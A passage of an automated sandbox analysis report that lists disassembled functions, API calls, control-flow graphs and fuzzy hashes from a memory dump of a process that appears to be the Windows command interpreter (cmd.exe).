                                                                                                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4E81
                                                                                                                    • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4F69
                                                                                                                    • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4F95
                                                                                                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FB0
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FC1
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FD8
                                                                                                                    • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FF8
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD5037
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD504B
                                                                                                                    • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD50DF
                                                                                                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD50F2
                                                                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD510F
                                                                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD5130
                                                                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD514A
                                                                                                                    • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD5175
                                                                                                                      • Part of subcall function 00007FF789BD3578: _get_osfhandle.MSVCRT ref: 00007FF789BD3584
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD359C
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35C3
                                                                                                                      • Part of subcall function 00007FF789BD3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35D9
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35ED
                                                                                                                      • Part of subcall function 00007FF789BD3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD3602
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressHandleProcProcess$AllocCommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireAllocateBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                    • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                    • API String ID: 3614140610-3021193919
                                                                                                                    • Opcode ID: 26c4a5be1374ecc4c1545982d09c2704671cd2583fe219aad5da637b47a9b9f8
                                                                                                                    • Instruction ID: 22efc88dd552683d3af2fb7c024f1b8c5bdbf79637bb056f4780cf7cfe8c1f69
                                                                                                                    • Opcode Fuzzy Hash: 26c4a5be1374ecc4c1545982d09c2704671cd2583fe219aad5da637b47a9b9f8
                                                                                                                    • Instruction Fuzzy Hash: 99C16F61A09A4A96EA44BF21E814178EFB1FF89F92FE48134D90E03795EF3DA445C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD3C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 732 7ff789bd3c24-7ff789bd3c61 733 7ff789bd3c67-7ff789bd3c99 call 7ff789bcaf14 call 7ff789bcca40 732->733 734 7ff789bdec5a-7ff789bdec5f 732->734 743 7ff789bd3c9f-7ff789bd3cb2 call 7ff789bcb900 733->743 744 7ff789bdec97-7ff789bdeca1 call 7ff789bd855c 733->744 734->733 736 7ff789bdec65-7ff789bdec6a 734->736 738 7ff789bd412e-7ff789bd415b call 7ff789bd8f80 736->738 743->744 749 7ff789bd3cb8-7ff789bd3cbc 743->749 750 7ff789bd3cbf-7ff789bd3cc7 749->750 750->750 751 7ff789bd3cc9-7ff789bd3ccd 750->751 752 7ff789bd3cd2-7ff789bd3cd8 751->752 753 7ff789bd3ce5-7ff789bd3d62 GetCurrentDirectoryW towupper iswalpha 752->753 754 7ff789bd3cda-7ff789bd3cdf 752->754 756 7ff789bd3fb8 753->756 757 7ff789bd3d68-7ff789bd3d6c 753->757 754->753 755 7ff789bd3faa-7ff789bd3fb3 754->755 755->752 759 7ff789bd3fc6-7ff789bd3fec GetLastError call 7ff789bd855c call 7ff789bda5d6 756->759 757->756 758 7ff789bd3d72-7ff789bd3dcd towupper GetFullPathNameW 757->758 758->759 760 7ff789bd3dd3-7ff789bd3ddd 758->760 763 7ff789bd3ff1-7ff789bd4007 call 7ff789bd855c _local_unwind 759->763 762 7ff789bd3de3-7ff789bd3dfb 760->762 760->763 765 7ff789bd3e01-7ff789bd3e11 762->765 766 7ff789bd40fe-7ff789bd4119 call 7ff789bd855c _local_unwind 762->766 773 7ff789bd400c-7ff789bd4022 GetLastError 763->773 765->766 769 7ff789bd3e17-7ff789bd3e28 765->769 775 7ff789bd411a-7ff789bd412c call 7ff789bcff70 call 7ff789bd855c 766->775 772 7ff789bd3e2c-7ff789bd3e34 769->772 772->772 776 7ff789bd3e36-7ff789bd3e3f 772->776 777 7ff789bd3e95-7ff789bd3e9c 773->777 778 7ff789bd4028-7ff789bd402b 773->778 775->738 780 7ff789bd3e42-7ff789bd3e55 776->780 782 7ff789bd3ecf-7ff789bd3ed3 777->782 783 7ff789bd3e9e-7ff789bd3ec2 call 7ff789bd2978 777->783 778->777 781 7ff789bd4031-7ff789bd4047 call 7ff789bd855c _local_unwind 778->781 787 7ff789bd3e66-7ff789bd3e8f GetFileAttributesW 780->787 788 7ff789bd3e57-7ff789bd3e60 780->788 799 7ff789bd404c-7ff789bd4062 call 7ff789bd855c _local_unwind 781->799 785 7ff789bd3ed5-7ff789bd3ef7 GetFileAttributesW 782->785 786 7ff789bd3f08-7ff789bd3f0b 782->786 791 7ff789bd3ec7-7ff789bd3ec9 783->791 793 7ff789bd3efd-7ff789bd3f02 785->793 794 7ff789bd4067-7ff789bd4098 GetLastError call 7ff789bd855c _local_unwind 785->794 795 7ff789bd3f0d-7ff789bd3f11 786->795 796 7ff789bd3f1e-7ff789bd3f40 SetCurrentDirectoryW 786->796 787->773 787->777 788->787 797 7ff789bd3f9d-7ff789bd3fa5 788->797 791->782 791->799 793->786 802 7ff789bd409d-7ff789bd40b3 call 7ff789bd855c _local_unwind 793->802 794->802 803 7ff789bd3f13-7ff789bd3f1c 795->803 804 7ff789bd3f46-7ff789bd3f69 call 7ff789bd498c 795->804 796->804 805 7ff789bd40b8-7ff789bd40de GetLastError call 7ff789bd855c _local_unwind 796->805 797->780 799->794 802->805 803->796 803->804 815 7ff789bd40e3-7ff789bd40f9 call 7ff789bd855c _local_unwind 804->815 816 7ff789bd3f6f-7ff789bd3f98 call 7ff789bd417c 804->816 805->815 815->766 816->775
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 1809961153-336475711
                                                                                                                    • Opcode ID: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                                                                                                                    • Instruction ID: b0d96a2fd9b7916e2b00d8c2bbcad7862bcae1d816a6a14b0cde534e318dba2c
                                                                                                                    • Opcode Fuzzy Hash: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                                                                                                                    • Instruction Fuzzy Hash: 1DD16F3260CB8992EA60EF15E4582B9FBB1FB84B96F944135DA4E437A5EF3CE444C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD2394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 914 7ff789bd2394-7ff789bd2416 memset call 7ff789bcca40 917 7ff789bde0d2-7ff789bde0da call 7ff789bd4c1c 914->917 918 7ff789bd241c-7ff789bd2453 GetModuleFileNameW call 7ff789bd081c 914->918 923 7ff789bde0db-7ff789bde0ee call 7ff789bd498c 917->923 918->923 924 7ff789bd2459-7ff789bd2468 call 7ff789bd081c 918->924 929 7ff789bde0f4-7ff789bde107 call 7ff789bd498c 923->929 924->929 930 7ff789bd246e-7ff789bd247d call 7ff789bd081c 924->930 937 7ff789bde10d-7ff789bde123 929->937 935 7ff789bd2483-7ff789bd2492 call 7ff789bd081c 930->935 936 7ff789bd2516-7ff789bd2529 call 7ff789bd498c 930->936 935->937 947 7ff789bd2498-7ff789bd24a7 call 7ff789bd081c 935->947 936->935 940 7ff789bde125-7ff789bde139 wcschr 937->940 941 7ff789bde13f-7ff789bde17a _wcsupr 937->941 940->941 944 7ff789bde27c 940->944 945 7ff789bde181-7ff789bde199 wcsrchr 941->945 946 7ff789bde17c-7ff789bde17f 941->946 949 7ff789bde283-7ff789bde29b call 7ff789bd498c 944->949 948 7ff789bde19c 945->948 946->948 956 7ff789bde2a1-7ff789bde2c3 _wcsicmp 947->956 957 7ff789bd24ad-7ff789bd24c5 call 7ff789bd3c24 947->957 951 7ff789bde1a0-7ff789bde1a7 948->951 949->956 951->951 954 7ff789bde1a9-7ff789bde1bb 951->954 958 7ff789bde264-7ff789bde277 call 7ff789bd1300 954->958 959 7ff789bde1c1-7ff789bde1e6 954->959 964 7ff789bd24ca-7ff789bd24db 957->964 958->944 962 7ff789bde1e8-7ff789bde1f1 959->962 963 7ff789bde21a 959->963 966 7ff789bde1f3-7ff789bde1f6 962->966 967 7ff789bde201-7ff789bde210 962->967 965 7ff789bde21d-7ff789bde21f 963->965 968 7ff789bd24dd-7ff789bd24e4 ??_V@YAXPEAX@Z 964->968 969 7ff789bd24e9-7ff789bd2514 call 7ff789bd8f80 964->969 965->949 970 7ff789bde221-7ff789bde228 965->970 966->967 972 7ff789bde1f8-7ff789bde1ff 966->972 967->963 973 7ff789bde212-7ff789bde218 967->973 968->969 974 7ff789bde254-7ff789bde262 970->974 975 7ff789bde22a-7ff789bde231 970->975 972->966 972->967 973->965 974->944 977 7ff789bde234-7ff789bde237 975->977 977->974 978 7ff789bde239-7ff789bde242 977->978 978->974 979 7ff789bde244-7ff789bde252 978->979 979->974 979->977
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                                    • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                    • API String ID: 2622545777-4197029667
                                                                                                                    • Opcode ID: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                                                                                                                    • Instruction ID: 60fd9973c3da53a564de136386a01161a2632694cfad739d6541687127a0554c
                                                                                                                    • Opcode Fuzzy Hash: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                                                                                                                    • Instruction Fuzzy Hash: ED919021B09B8A85EE24AF50D8582B8ABB1FF49F96FE44135C90E47695EF3CE505C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD0580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleMode_get_osfhandle
                                                                                                                    • String ID: CMD.EXE
                                                                                                                    • API String ID: 1606018815-3025314500
                                                                                                                    • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                    • Instruction ID: 3299cb7f43317e234de5a003531adecd52e5948384da8e56c3566d34a81e151e
                                                                                                                    • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                    • Instruction Fuzzy Hash: 7741A835A09746DBE644AF25E855578FEB0BB89F56FE58139C90E433A0EF3DA404C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCC620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 992 7ff789bcc620-7ff789bcc66f GetConsoleTitleW 993 7ff789bcc675-7ff789bcc687 call 7ff789bcaf14 992->993 994 7ff789bdc5f2 992->994 998 7ff789bcc68e-7ff789bcc69d call 7ff789bcca40 993->998 999 7ff789bcc689 993->999 997 7ff789bdc5fc-7ff789bdc60c GetLastError 994->997 1000 7ff789bdc5e3 call 7ff789bc3278 997->1000 1004 7ff789bdc5e8-7ff789bdc5ed call 7ff789bd855c 998->1004 1005 7ff789bcc6a3-7ff789bcc6ac 998->1005 999->998 1000->1004 1004->994 1007 7ff789bcc954-7ff789bcc95e call 7ff789bd291c 1005->1007 1008 7ff789bcc6b2-7ff789bcc6c5 call 7ff789bcb9c0 1005->1008 1013 7ff789bcc964-7ff789bcc972 call 7ff789bc89c0 1007->1013 1014 7ff789bdc5de-7ff789bdc5e0 1007->1014 1015 7ff789bcc9b5-7ff789bcc9b8 call 7ff789bd5c6c 1008->1015 1016 7ff789bcc6cb-7ff789bcc6ce 1008->1016 1013->997 1026 7ff789bcc978-7ff789bcc99a towupper 1013->1026 1014->1000 1020 7ff789bcc9bd-7ff789bcc9c9 call 7ff789bd855c 1015->1020 1016->1004 1019 7ff789bcc6d4-7ff789bcc6e9 1016->1019 1022 7ff789bdc616-7ff789bdc620 call 7ff789bd855c 1019->1022 1023 7ff789bcc6ef-7ff789bcc6fa 1019->1023 1038 7ff789bcc9d0-7ff789bcc9d7 1020->1038 1028 7ff789bdc627 1022->1028 1027 7ff789bcc700-7ff789bcc713 1023->1027 1023->1028 1033 7ff789bcc9a0-7ff789bcc9a9 1026->1033 1029 7ff789bdc631 1027->1029 1030 7ff789bcc719-7ff789bcc72c 1027->1030 1028->1029 1035 7ff789bdc63b 1029->1035 1034 7ff789bcc732-7ff789bcc747 call 7ff789bcd3f0 1030->1034 1030->1035 1033->1033 1036 7ff789bcc9ab-7ff789bcc9af 1033->1036 1045 7ff789bcc8ac-7ff789bcc8af 1034->1045 1046 7ff789bcc74d-7ff789bcc750 1034->1046 1043 7ff789bdc645 1035->1043 1036->1015 1039 7ff789bdc60e-7ff789bdc611 call 7ff789beec14 1036->1039 1041 7ff789bcc872-7ff789bcc8aa call 7ff789bd855c call 7ff789bd8f80 1038->1041 1042 7ff789bcc9dd-7ff789bdc6da SetConsoleTitleW 1038->1042 1039->1022 1042->1041 1053 7ff789bdc64e-7ff789bdc651 1043->1053 1045->1046 1052 7ff789bcc8b5-7ff789bcc8d3 wcsncmp 1045->1052 1049 7ff789bcc752-7ff789bcc764 call 7ff789bcbd38 1046->1049 1050 7ff789bcc76a-7ff789bcc76d 1046->1050 1049->1004 1049->1050 1056 7ff789bcc773-7ff789bcc77a 1050->1056 1057 7ff789bcc840-7ff789bcc84b call 7ff789bccb40 1050->1057 1052->1050 1058 7ff789bcc8d9 1052->1058 1059 7ff789bcc80d-7ff789bcc811 1053->1059 1060 7ff789bdc657-7ff789bdc65b 1053->1060 1065 7ff789bcc780-7ff789bcc784 1056->1065 1078 7ff789bcc856-7ff789bcc86c 1057->1078 1079 7ff789bcc84d-7ff789bcc855 call 7ff789bccad4 1057->1079 1058->1046 1061 7ff789bcc9e2-7ff789bcc9e7 1059->1061 1062 7ff789bcc817-7ff789bcc81b 1059->1062 1060->1059 1061->1062 1069 7ff789bcc9ed-7ff789bcc9f7 call 7ff789bd291c 1061->1069 1067 7ff789bcc821 1062->1067 1068 7ff789bcca1b-7ff789bcca1f 1062->1068 1070 7ff789bcc83d 1065->1070 1071 7ff789bcc78a-7ff789bcc7a4 wcschr 1065->1071 1074 7ff789bcc824-7ff789bcc82d 1067->1074 1068->1067 1073 7ff789bcca25-7ff789bdc6b3 call 7ff789bc3278 1068->1073 1089 7ff789bdc684-7ff789bdc698 call 7ff789bc3278 1069->1089 1090 7ff789bcc9fd-7ff789bcca00 1069->1090 1070->1057 1076 7ff789bcc8de-7ff789bcc8f7 1071->1076 1077 7ff789bcc7aa-7ff789bcc7ad 1071->1077 1073->1004 1074->1074 1081 7ff789bcc82f-7ff789bcc837 1074->1081 1083 7ff789bcc900-7ff789bcc908 1076->1083 1084 7ff789bcc7b0-7ff789bcc7b8 1077->1084 1078->1038 1078->1041 1079->1078 1081->1065 1081->1070 1083->1083 1091 7ff789bcc90a-7ff789bcc915 1083->1091 1084->1084 1092 7ff789bcc7ba-7ff789bcc7c7 1084->1092 1089->1004 1090->1062 1095 7ff789bcca06-7ff789bcca10 call 7ff789bc89c0 1090->1095 1096 7ff789bcc917 1091->1096 1097 7ff789bcc93a-7ff789bcc944 1091->1097 1092->1053 1098 7ff789bcc7cd-7ff789bcc7db 1092->1098 1095->1062 1114 7ff789bcca16-7ff789bdc67f GetLastError call 7ff789bc3278 1095->1114 1099 7ff789bcc920-7ff789bcc928 1096->1099 1102 7ff789bcca2a-7ff789bcca2f call 7ff789bd9158 1097->1102 1103 7ff789bcc94a 1097->1103 1100 7ff789bcc7e0-7ff789bcc7e7 1098->1100 1105 7ff789bcc932-7ff789bcc938 1099->1105 1106 7ff789bcc92a-7ff789bcc92f 1099->1106 1107 7ff789bcc800-7ff789bcc803 1100->1107 1108 7ff789bcc7e9-7ff789bcc7f1 1100->1108 1102->1014 1103->1007 1105->1097 1105->1099 1106->1105 1107->1043 1112 7ff789bcc809 1107->1112 1108->1107 1111 7ff789bcc7f3-7ff789bcc7fe 1108->1111 1111->1100 1111->1107 1112->1059 1114->1004
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleTitlewcschr
                                                                                                                    • String ID: /$:
                                                                                                                    • API String ID: 2364928044-4222935259
                                                                                                                    • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                                                    • Instruction ID: b8abf05d1ee36f7657701d36279c7cd405663751491767debf31f8a4a979afa1
                                                                                                                    • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                                                    • Instruction Fuzzy Hash: 21C1C361A0864A81EB54BF25D818279EAB0FF91FAAFE45531D91E472D5EF3CEC41C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD8D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1171 7ff789bd8d80-7ff789bd8da2 1172 7ff789bd8da4-7ff789bd8daf 1171->1172 1173 7ff789bd8db1-7ff789bd8db4 1172->1173 1174 7ff789bd8dcc 1172->1174 1175 7ff789bd8db6-7ff789bd8dbd 1173->1175 1176 7ff789bd8dbf-7ff789bd8dca Sleep 1173->1176 1177 7ff789bd8dd1-7ff789bd8dd9 1174->1177 1175->1177 1176->1172 1178 7ff789bd8ddb-7ff789bd8de5 _amsg_exit 1177->1178 1179 7ff789bd8de7-7ff789bd8def 1177->1179 1182 7ff789bd8e4c-7ff789bd8e54 1178->1182 1180 7ff789bd8e46 1179->1180 1181 7ff789bd8df1-7ff789bd8e0a 1179->1181 1180->1182 1183 7ff789bd8e0e-7ff789bd8e11 1181->1183 1184 7ff789bd8e73-7ff789bd8e75 1182->1184 1185 7ff789bd8e56-7ff789bd8e69 _initterm 1182->1185 1186 7ff789bd8e13-7ff789bd8e15 1183->1186 1187 7ff789bd8e38-7ff789bd8e3a 1183->1187 1188 7ff789bd8e80-7ff789bd8e88 1184->1188 1189 7ff789bd8e77-7ff789bd8e79 1184->1189 1185->1184 1192 7ff789bd8e3c-7ff789bd8e41 1186->1192 1193 7ff789bd8e17-7ff789bd8e1b 1186->1193 1187->1182 1187->1192 1190 7ff789bd8eb4-7ff789bd8ec8 call 7ff789bd37d8 1188->1190 1191 7ff789bd8e8a-7ff789bd8e98 call 7ff789bd94f0 1188->1191 1189->1188 1200 7ff789bd8ecd-7ff789bd8eda 1190->1200 1191->1190 1201 7ff789bd8e9a-7ff789bd8eaa 1191->1201 1198 7ff789bd8f28-7ff789bd8f3d 1192->1198 1195 7ff789bd8e2d-7ff789bd8e36 1193->1195 1196 7ff789bd8e1d-7ff789bd8e29 1193->1196 1195->1183 1196->1195 1203 7ff789bd8ee4-7ff789bd8eeb 1200->1203 1204 7ff789bd8edc-7ff789bd8ede exit 1200->1204 1201->1190 1205 7ff789bd8eed-7ff789bd8ef3 _cexit 1203->1205 1206 7ff789bd8ef9 1203->1206 1204->1203 1205->1206 1206->1198
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
